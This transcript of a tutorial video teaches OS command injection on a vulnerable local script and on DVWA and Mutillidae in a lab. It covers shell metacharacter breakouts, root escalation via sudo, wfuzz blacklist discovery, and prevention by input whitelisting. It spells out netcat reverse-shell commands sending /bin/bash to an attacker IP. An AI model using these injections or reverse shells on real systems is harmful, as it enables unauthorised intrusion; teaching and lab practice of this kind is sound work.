Hello everyone, today's video is on command injection from OWASP top 10. So today we are going to be looking at what is OWASP, what is OWASP top 10, what is injection, and then specifically what is OS command injection. Then we will focus a bit on setting up our environment. Then we will learn how we can break out of commands. Then we will exploit command injection first locally and then on a web server, and then we will discuss how we can prevent against this vulnerability. So first, what is OWASP? OWASP stands for Open Web Application Security Project. It is a non-profit organization which aims to improve the security of web applications. What is OWASP Top 10? It is an awareness document for developers and in general web application security. It represents a consensus for the most critical security risks to web applications. The first item on this list is injection. Injection can be of many different things. For example, SQL, NoSQL, OS command injection, which we will be covering today, and other languages. It occurs when untrusted user data is sent as part of a command or query. That data is not sanitized and then is interpreted as part of that query and subsequently executed. And this can cause the server to execute unintended commands or access some sensitive data from the SQL databases. We will be covering all these risks in our upcoming videos. But today we will specifically focus on OS command injection. So what is OS command injection or shell command injection? It is the ability to inject commands in an application which are executed in the shell of the target machine. These commands might be run in bash or the sh shell in Linux, or if the target is Windows, then they may be run in the command prompt or PowerShell. These commands need to be tailored to the target machine's operating system and the shell in which it is being executed, since these are different across different operating systems and shells. This command injection only occurs when the user input is left unsanitized and all the special characters in it are passed exactly as they are to the shell. The shell interprets these characters as having some special meaning, and thus shell command injection occurs. To learn command injection, let us take a simple scenario where we have compromised a user and we are allowed to run the following Python script as root. So this script simply imports the OS module. The OS module allows us to interact with the operating system in Python, and then we use os.system. So the argument passed to os.system will be executed in the shell, and we simply use the echo command, echo hi there, plus that means we have joined the input without sanitizing it. So we ask the user enter your username, then we concatenate it to this string and we execute it in the shell without sanitizing the input. So this is highly vulnerable to command injection. To simulate this scenario, we booted up a Kali Linux machine, added a user called compromised, and then added him to the sudoers group so that it can run script.py, which is located in its home directory, without any password. Then we put the contents of script.py, mark it as executable, and then just try to run it as sudo, and first without sudo and then with sudo. Now that we have set up a scenario, we can try to exploit that script. But what do we want? We either want code execution or even possibly a shell. So we need to somehow break out of that echo command and then add our own command which should be executed. So to break out of that command, we can use certain special symbols. The first option we have is to terminate the first command and then put our command. Now we can do this in three ways. First is using the semicolon, second 2 ampersands, and third 2 pipes. The semicolon will straight up terminate the first command, and after that we can put our own command. Now what the 2 ampersands do is that they stand for the AND logical operation. So if the first command exits with a status code of 0, then only will the second command run. Otherwise, the second command will not run. What the OR does is that if the first command exits with a status code of 0, then it will not even bother to run the second command. But if the first command does not exit with a status code of 0, it will then only run the second command. The other option we have is to chain the commands together, which we can do using the pipe or the pipe and ampersand. What the pipe does is pipe the std out or the standard output of the first command to the standard input of the second command. What the pipe ampersand does is output the std error or the standard error of the first command to the input of the second command. The next we have is to place a command inside a command. For this we can use either two backticks, or we can enclose our command in brackets preceded by a $sign. There might be more ways which I am unaware of and therefore have not listed. So now let us exploit our own Python script. So first I'm going to open up a terminal, and we created the script.py in our home directory. So using the symbols which we discussed in the previous slide, let's try to exploit this script. So when we simply enter something without any special characters, it just echoes it out. And now let us try the first character in our list, the semicolon. As soon as we put a semicolon, we see a syntax error. It says end of file unexpected. So what it means is that once we put a semicolon after echo command, it means that the echo command is terminated, and after that we have the new command or the next command. But the next symbol that we have is simply the exclamation mark. So if I put echo hello semicolon and exclamation mark, then there was no problem. But since it is being used in this script, it says that the end of file is unexpected and there is not even a new line. That is why it is complaining about syntax error. Now let us put this hash sign. There was no error this time. Why? The hash sign stands for a comment. So if I put hash bash, there was no new bash terminal spawn. If I exit, it will close the terminal, because as I told you, the hash stands for a comment. So anything after hash will be a comment and will not be executed. So we can use this to our advantage and put semicolon hash, and we see that there was no syntax error, and we can inject our command after the semicolon and before this hash. So if we run this, we see that our id command got executed. So what exactly happened was the script executed echo hi there and then a semicolon id exclamation mark plus hash hash plus exclamation mark. So till echo hi there was no problem. Then we executed the id command, since the semicolon marks the delimiter or the next command, and then everything after this hash sign is a comment, and so it does not get executed. So that was why our command got executed. Now instead of the semicolon, we can also try this with the two ampersands, which stand for and then put a id command and then again the hash symbol, and we see it still got executed since the echo command returned with the status code of 0. So if I do echo hello and echo $question mark, the $question mark is a special variable which points to the return value of the previous command. So if I do echo $question mark, it says 0. That means the echo hello command returned with a status code of 0, and that is why when the echo hi there command exited with a status code of 0, our id command got executed. Had that command not executed with had not exited with the exit code of 0, then our id command would not have been executed. Now we can also try the two pipes which stand for OR. Now we put our id command and hash, and this time it did not get executed. Why? Since the echo hi there command exits with the status code of 0. What this two pipes symbolizes is OR. So if the first command fails, only then will it run the second command. But since the first command exited with the status code of 0, there was no need to run the second command. We use most of these delimiters depending on the blacklist, which all characters we are not allowed to use, and depending on that we use some other characters. Now this was the semicolon, 2 ampersands and double pipe. Now we can try the single pipe and put ID and again the hash symbol, and this time we got the code executed, but there was no output of the high there. Why was it so? Because the standard output of the echo command, which was this thing, got piped as the standard input of the ID command, and that is why we do not see this echoed back, since it was sent as the input of the ID command. And since the ID command does not take any input, there was no problem in executing that command. And now we can try the other technique of putting a command inside a command. So we can use backticks like this and see that we did not need the hash. Why we did not need the hash? Because our command became echo hello plus backticks and this. So what the backticks will do is that replace this whole thing with the standard output of the command enclosed inside it, which is this. So the same thing happened over here also, that this backticks ID was replaced by the output of the ID command. Now we can again run the script, and this time instead of using the backticks, we can do dollar and brackets, and inside the brackets our command, and we see that the output is same as if we had used backticks. So that was exploiting the script by injecting our command. Now we can use this to give us a bash shell. So for example, we can use semicolon bash hash sign, and we see hi there, and then a new bash terminal open. How can I say a new terminal open? Well, if I exit out of this, the terminal did not close, since it was a nested bash session. Now we also use different symbols depending on our need. For example, here I could not have used backticks. Why? If I used backticks, what would happen is that bash would get executed. So I am inside bash right now. Let's try to use the ls command, the pwd command. We get no output. Now if we exit out of this shell, we see hi there, then desktop documents down, which is the output of the ls command, then /home/compromised, which is the output of the pwd command. So what happened was that we did echo hello spelling, and then inside backticks we put bash. So this backticks would be replaced by the standard output of bash. Now in the standard output of bash, we put in the standard input we put the ls command, and in the output we got this whole thing which got stored. Then we again put the pwd command, and bash outputted this thing, so it also got stored. And then when we exited out of bash, all this was put in the echo command, and that's why it got executed. So we always use these depending on the circumstances and the command being used. So now we can view what commands we are allowed to run as root with sudo -l, and since we have already set this up, we can see that we can run this script, which is in our current directory, without a password as any user. Now the commands to configure these settings will be available in the description also. So we can simply do sudo this, and we see that we were not prompted for our password, since it is configured to run with no password. And then we can enter our name, which simply outputs it back, and this is still vulnerable to command injection. So what if we do semicolons id hash sign? We see that we got code execution as the root user. So this is very dangerous. Now what if we simply used bash, and we have successfully exploited this script and injected our own command and got a bash shell. Now instead of putting simply bash if this was running on a web application. Right now this is running locally. This command injection can occur in any application. Right now this script is being run locally, but what if this was a web server and this script was being run on a web server and we were allowed to give the input of the name and it was not sanitized? Well, we could have gotten a reverse shell. Right now this is just a local shell. If it was a web application, we would have simply gotten a reverse shell back. So now let's exploit this on a web application of Metasploitable. So I have got Metasploitable booted up, and Kali Linux and Metasploitable are both connected to the same NAT network. I'm going to open up a terminal and ping the Metasploitable machine, which has the IP address of 10.0.2.6. and my machine has an IP address of 10.0.2.5. So we are going to open up Firefox, since we need a web browser, and then we are going to go to the website of Metasploitable, which is hosted locally on port 80. So we are going to use the DVWA, which stands for Damn Vulnerable Web Application, and we are also going to use Mutillidae. I don't know how to pronounce that. So the username I think is admin and password is password, which is the default credentials for the Damn Vulnerable Web Application. We have many vulnerabilities in this application, and we are going to exploit all of them in the upcoming videos. For now, we are going to go to the security and change this security to low, so that we can easily exploit this. And we are going to go to the command execution panel, and we see that we are allowed to ping for free. We are allowed to ping any IP address. So let's try to put the IP address of 127.0.0.1. What this will do is point back to the Metasploitable machine. Let's see if the Metasploitable machine gets pinged, and we see that it is pinging its own self. But we can see that we were able to ping that IP address. Let's go to 10.0.2.5, which is our own IP address, 10.0.2.5. What we are also going to do is use a tool called TCP dump. With TCP dump, it is just like Wireshark. We can capture packets using TCP dump on our network, and we are going to listen for ICMP, that is ping packets. We could have used Wireshark also, but I feel that it is much easier to use TCP dump. The sudo TCP dump -i, and then we put ICMP and the password for sudo. And right now I'm using my own default user, and then we can just click submit, and we see we received ICMP packets from 10.0.2.6, which is the Metasploitable machine. So it is able to reach us via ping. So we see that it pinged us echo request, and then we sent a reply back, which is the reply, and this happened 3 times. So we can kill this TCP dump now. And now what happens if we put a semicolon? Nothing happened, because what happens if we just execute the ping command? We get an error. So now if we put semicolon ID, and the ID command got executed, and we have the output of the ID command. So let's try who am I, www-data. It is the default user as which web applications run on Linux. So now we would like a reverse shell, please, because we cannot just simply type bash and get a shell, since this is on the remote machine. So what we do is use one of the commands from Pentest Monkey's reverse shell cheat sheet. We can either Google and bring it up, and we can copy and paste from there, or we can use some commands which we already used in the last video. So one of it was nc-e/bin/bash 10.0.2.5 and port, let's use 9001, and let's listen on the port 9001. So we are listening on port 9001, and netcat software is installed on that target machine, as we have previously exploited this, and we have piped bin bash to this IP address at this port. If you are wondering where did that come from, it is all in this reverse shell cheat sheet. And let's submit this query, and we see that we got a connection back, but there is no prompt, and this has also hanged. So let's try to put the id command, and we can see that we have got code execution. So this is a reverse shell. Now we can use the commands used previously to get a better shell, which is python 3-c import pty.spawn bin bash. Instead of python 3, we could have simply used python 2 also, or any other version. Let's see if python is installed. So we have python, so python-c, and let's copy this thing, and we see that we have instantly got a better shell. If we wanted, we could have used the tty trick using stty raw -echo and other things to get a fully interactive shell. Now what we are going to do is that this was just a simple low security one. Now we are going to increase the security of this web application and exploit this at medium security. So if you are wondering, we can also view the source code with the view source button over here. And let's look at what this says. So this is PHP code, as we can see, and it says if is set $post submit. So what it says is if it is a post request, and in the post request we have specified a submit variable, then the target is equal to the IP variable which is in the request. Now determine the OS and execute the ping command. So what it does is that it executes the command and checks if it is Windows. If it is Windows, it executes as ping and then space, and then this dot stands for join, and then it joins the IP address. Since ping on Windows only pings 3 times, whereas on Linux it continues for infinity. So therefore in the else section we have that if it is not Windows, then ping for a count of 3 times the target IP address. And since it is being unsanitized and joined to this command, we can easily break out of it. So now let's go and increase the security of this web application. Let's change it to medium and submit this thing. Now let's go back to command execution. Let's again put the IP address of 127.0.0.1. We have submitted it and see that it is still executing the ping command. Now let's put the semicolon and ID. And this time there was nothing that we saw. So there was no output, 0 output. Let's try something else. Let's try who am I. Still no output. Why is that? Well, because there is a blacklist in this medium security level. So we can view the source by clicking on this view source button and see that we see that remove any of the characters in the array, which is the blacklist. So we substitutions array, the 2 ampersands are substituted as nothing, and the semicolon is also removed from the command, and we see str replace, which will replace this everything in this substitutions by this thing and in the IP address. So what happens is that if we put semicolon 127.0.0.1 ID, this semicolon will be replaced and deleted. So there was an error. Now since we know the blacklist right now, we can use some other symbols which we discussed. Instead of using the 2 ampersands or semicolon, we can use backticks ID. Now it is now trying to ping the output of the ID command. So what we can do is, instead of using backticks, we can use the pipe symbol. Since Since the pipe symbol is not blacklisted, we get a reverse shell. And now we can simply do again nc-e bin bash 10.0.2.6 9001 and my IP address is 5. So now we can do nc-lvnp 9001 and just submit this back again, and we see that we have got a reverse shell and we have got code execution again. Now what if we didn't know the blacklist? What if we did not know the source and we did not have the source code and we did not know the blacklist? So what we could do is put the symbols one by one and find out the blacklist. So we would have first put semicolon id, nothing. Then we put 2 ampersands id, nothing. Then we would have done pipe id and we have got code execution that way. And there are many tools available for this. One of them is wfuzz, which is, these are web fuzzers. So what is fuzzing? Fuzzing is a way of brute forcing. So what this would do is replace the keyword fuzz wherever we mention this keyword fuzz with the line of a word list. So what are word lists? Word lists are lists which contain one word per line. So there are word lists for cracking passwords, brute forcing login forms, some special characters, brute forcing web directories. We have even tools to brute force web directories, GoBuster, DBuster, we have Dub, DIRB. We have many tools like this. We are going to use a tool called fuzz. So it is not installed by default. We will have to install it. Sudo apt install fuzz. wfuzz. It is a tool written in Go language, and I think this will take a lot of time. So while this is installing, we can try to use wfuzz. So we can use wfuzz and look at the help menu, and I'm going to make it a little smaller, and we see that it has given us a lot of options. So there are lot of options. So the main ones we can see is -c output with colors, --of save fuzz results to a file which it can use later, then -v verbose information, -f write to a file in raw format, then we have -t the threads, then -n for specifying the delay, and -r which is the recursion level, and then we have many other options, the -u which is URL, -z payload. Now where did I do? Yeah, so specify a payload for each fuzz keyword used in the form of name, parameter and encoder. Okay, and then we have -w for word list. Instead of using -z, we could instead of using -z file comma word list, we could have simply used -w word list. So now let's put this to use. So we have wfuzz -u. What is our URL? http it is 10.0.2.6 slash let me just copy this thing, paste it over here and remove this thing. And what we are going to use the developer tools, go to the network tab and send the post request again, and we are going to simply put the IP address 127.0.0.1 because we just want to take a look at our post request. So why do we want to take a look at our post request? Because we want to see what all was sent to that server. So we see our request and we see that IP is equal to this and submit is equal to submit. So what we are going to do is replace this IP with our special characters. So how do we do that? Well, we give wfuzz a word list which contains all the special characters, and we just replace this IP with the keyword of fuzz in all caps. So what this will do is replace the fuzz keyword with the everything in the word list. So first we will have to see how do we convert this into a post request. I really don't know. So let's just try as -d, which stands for post data, id equal to fuzz and this equal to this. So let's put this as ip equal to fuzz. So take every word in that word list and put it as the value of ip, and then submit is equal to submit. This is exact same as this thing. The only thing we have replaced is 127.0.0.1 with the fuzz keyword, so that it gets replaced with every line of the word list. And I'm going to stop this thing and create a word list in my current directory, word list. So let's put some special characters over here. First let's put the semicolon, then one and, then two ands, then one pipe, two pipes, backtick. Let's put two backticks for that matter. Then we had this symbol, and I'm going to put the id command in all of them. Okay. I don't think this will work, and this. So we have a word list ready, and we are going to use the wfuzz command with our word list. And I'm going to press enter, and we see this, that it was a 302 redirect. Why a 302 redirect? Because we have not authenticated to the damn vulnerable web application, and we have this cookie. So security and PHP session ID. So we will have to tell wfuzz to use these cookies. Now like this, -b cookie. So how do we specify cookies? By using, I think, like this, PHP session ID, and I'm going to copy this like this, and then again for security is equal to medium, and let's try to fuzz this again, and we see that response was 200 and 87, 86, 86, 87, 86. That means 2 lines are extra in this and 2 lines are extra in this. We see a difference of words and difference of characters. So what happened was, it used every line in the word list, copied it, put it as input to this command, and sent a post request. And instead of doing the manual way, submitting the form and again, what we told it to do was simply take every word in the word list and replace the fuzz keyword with every line in that word list. So it took the first line, which was this, put it as IP equal to this thing and submit equal to submit, and sent it to the server. And we required these cookies for authentication. If you do not remember what cookies are, I would recommend you go and watch my previous video. And then it did the same for all of these commands, and since there was a blacklist on the semicolon and the 2 ampersands, we see that it is the same for them. The number of characters is same for each of this payload. So that is how we can use wfuzz to find out the blacklist. We could have also used fuff, which is a better tool in my opinion, since it is a lot faster, but I think that was enough fuzzing for today. And now let's see how we can secure this. We will go to the DVWA security and change it to high. Since this is an older version of DVWA, the high is actually the inexploitable level. So if we go and view the source code, we see that there is a lot of code over here. So what this will do is split the IP into 4 octets. So what are octets? Let's see. We have an IP address of 127.0.0.1. What this will do is split it at dots. So it will split this into 4 parts, which will become 127 space 0 space 0 space 1. And then it will check if each octet of that is a 4 is a number, and there are only 4 parts present in it. So we have split an IP address into 4 parts. Let me show you graphically. So we had an IP address of 127.0.0.1. Then we split it at all these dots. So we split it over here, then over here, and then over here. So what it became is 127, a 0, again a 0, and 1. So it was split into 4 parts. The first became this, second became this, third became this, and fourth became this. Now we check if each of these is an integer. So if instead of 127.0.0.1 we would have put abc.0.0.1, and it would have become like this. So this check would have failed, and it would have immediately said that error, you have entered an invalid IP. So let's try that. Let's put ABC, error, you have an invalid IP. Let me put a semicolon, you have invalid IP, because semicolon is not an integer. Semicolon ID, you have entered an invalid ID. Pipe ID, you have entered an invalid IP address. So we can put any command and we will see that it is invalid, because none of our commands is an integer, and also that the size of all of them split at dots should be equal to 4. So if we split it at dots, it should be equal to 4. So it checks that if all of them are integers, then put the IP address back together and then only execute the command. And this is how we can prevent command execution. Preventing command execution involves that we check the user input for special characters. In this case, since we required only an IP address, then all of the input should be an integer except for the dot. But if we were required to enter some alphanumeric input, then it would have been beneficial to check only for some special characters. Okay, so what do I mean by that? What do I mean by alphanumeric input? For that, we will go to Mutillidae. We are going to go to OWASP top 10, since this video is on command injection, and we are going to go to DNS lookup. So it says, who would you like to do a DNS lookup on? Enter IP or host name. Let's do google.com, and it got us information of google.com. So name google.com and address is this. So if you do not remember, DNS is the protocol which is used to convert a host name to an IP address. Now if I put 127.0.0.1 lookup DNS, and you see that there is nothing over here. So it seems that it is using the dig command. Dig is a command with which we can find out or perform a DNS lookup. We can also use the host command, host google.com, and we have some more information. I don't know exactly which command is being used, so let's see. And now let us try our usual check of semicolon. So semicolon got no result. So let's do semicolon ID, and we again simply got code execution like this. So simply semicolon and then who am I, DNS lookup, we got www-data, since this is also not filtered. Now let's again get our reverse shell nc-e/bin/bash 10.0.2.6 9001. My IP is 10.0.2.5. Now let's listen on 9001 port do a lookup DNS, and we got a reverse shell back. And now let's upgrade this. Python-c import pty.spawn bin bash, and I spelled import wrong. Wow. Python-c import, and I think the rest is correct. Copy paste, and I closed it again. Okay, so we have now got a better shell. We can view all the files over here, and now we can view the source code of that file. So this file is called dnslookup.php. So we can do cat dnslookup.php, and now we can view the source code. Make it a little smaller and go up. So let's try from the start. Switch $session security level. So what is the security level? It checks the security level, and then let's move forward. This is the HTML output which we see on our screen, and then if post DNS lookup PHP submit button, then target host underscore validate. If that host is validated, echo result for this, and then we use the command nslookup plus the target host, and this is being used with shell exec without being sanitized. So it is, what happens is, it is being executed as nslookup plus our command. So if it is google.com, it is like this. Now what if we put a semicolon id and it is getting executed? The same thing is happening on this web server. We do an nslookup google.com semicolon our command, and we get command execution. This is hand. This will perform a lookup for google.com, and then we will have our code executed. It is stuck because of our reverse shell, and as soon as I kill our reverse shell, we have our code executed. So this is how dangerous command injection can be in web applications. Right now these were of medium to low security level. Mutillidae was still fairly low security level, and so was the damn vulnerable web application. Sometimes it might be harder to spot the command injection flaw, and it might be even more difficult to exploit this. So now let us see how we can prevent this. So how do we prevent command injection? Well, one way is to always sanitize the user input against a blacklist before passing it to be executed. The other way is to prepare a whitelist which contains all the characters required in the user input. If the user input contains any character which is not in the whitelist, then the request should not be processed. For example, in the Mutillidae app, the function was to perform a DNS lookup. So the whitelist could include the alphabets, digits, a couple of special symbols such as hyphens and underscores which occur in URLs, and full stops. So, and these should have been put in a whitelist, and if the user input contained any special characters or any other character not in the whitelist, the server should refuse to process the request. So that was all for this video. Thank you for watching. Please like, share and subscribe. And if you have any questions, you can ask me by the comment section below, or contact me via the contact form at my website creativerobotics.org. Thank you.